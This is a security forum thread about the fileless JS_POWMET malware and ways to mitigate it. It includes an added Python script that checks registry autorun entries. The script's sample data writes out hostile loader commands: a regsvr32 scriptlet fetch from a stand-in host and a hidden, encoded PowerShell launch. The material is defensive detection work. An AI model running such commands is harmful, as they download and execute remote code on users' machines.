JS_POWMET malware is 100% fileless, from infection to payload

Discussion in 'malware problems & news' started by itman, Aug 2, 2017.

  1. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    https://www.scmagazine.com/search/Trend Micro/
     
  2. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    Do the regsvr32 command line options look familiar, folks?
    http://blog.trendmicro.com/trendlab...e/look-js_powmet-completely-fileless-malware/
     
  3. Sordid

    Sordid Registered Member

    Joined:
    Oct 25, 2011
    Posts:
    231
  4. NormanF

    NormanF Registered Member

    Joined:
    Feb 20, 2009
    Posts:
    2,354
    The culprit is PowerShell. Disable it or remove it to mitigate fileless malware attacks.
     
  5. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,292
    Location:
    Europe then Asia
    There are several techniques to load PowerShell scripts without powershell.exe.
    This malware could be modified to do that.
     
  6. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    6,115
    Location:
    U.S.A.
    You stop malware like this by using a security solution that monitors what is written to the registry Run and RunOnce keys. Anything after that point is a losing effort.
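An added example, not code from this thread or from the Trend Micro write-up, of the kind of Run/RunOnce check the post above argues for: it classifies autorun command strings and flags regsvr32 loading a remote scriptlet through scrobj.dll (the command-line pattern referred to earlier in the thread) and PowerShell started hidden or with an encoded command. The autorun entries below are constructed samples, not real indicators; on a live host the same strings come from the HKCU/HKLM `...\CurrentVersion\Run` and `RunOnce` values.

```python
import re
import shlex

# Constructed sample autorun values (not real indicators), shaped like the
# string values found under HKCU/HKLM ...\CurrentVersion\Run and RunOnce.
SAMPLE_AUTORUNS = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"regsvr32 /s /n /u /i:https://example.invalid/x.sct scrobj.dll",
    "Helper": r"powershell -w hidden -nop -enc SQBFAFgA",
    "Audio": r'"C:\Program Files\Realtek\Audio\RtkNGUI64.exe" -s',
}
# regsvr32's /i: argument pointing at an http(s) URL instead of a local file
URL_RE = re.compile(r"^/i:https?://", re.IGNORECASE)

def classify_autorun(command):
    """Return the reasons an autorun command looks like a fileless loader."""
    try:
        argv = shlex.split(command, posix=False)  # keep Windows backslashes and quotes
    except ValueError:
        argv = command.split()
    if not argv:
        return []
    exe = argv[0].strip('"').lower().rsplit("\\", 1)[-1]  # basename of the image
    args = [a.lower() for a in argv[1:]]
    reasons = []
    if exe in ("regsvr32", "regsvr32.exe"):
        if any(URL_RE.match(a) for a in args):
            reasons.append("regsvr32 /i: fetches a remote scriptlet")
        if "scrobj.dll" in args:
            reasons.append("regsvr32 loads scrobj.dll, the scriptlet host")
    if exe in ("powershell", "powershell.exe", "pwsh", "pwsh.exe"):
        if any(a in ("-e", "-ec", "-enc", "-encodedcommand") for a in args):
            reasons.append("powershell given an encoded command")
        if "hidden" in args and any(a in ("-w", "-windowstyle") for a in args):
            reasons.append("powershell started with a hidden window")
    return reasons

def scan_autoruns(entries):
    """Map value name -> reasons, keeping only the entries that raised a flag."""
    flagged = {}
    for name, cmd in entries.items():
        reasons = classify_autorun(cmd)
        if reasons:
            flagged[name] = reasons
    return flagged

if __name__ == "__main__":
    for name, why in scan_autoruns(SAMPLE_AUTORUNS).items():
        print(name, "->", "; ".join(why))
```

Benign entries such as OneDrive and the audio tray app pass through untouched; feeding the scanner the real value strings (for example via the winreg module or an Autoruns export) turns it into a quick triage pass over a host's persistence keys.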
     
  7. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    6,912
    Location:
    U.S.A. (South)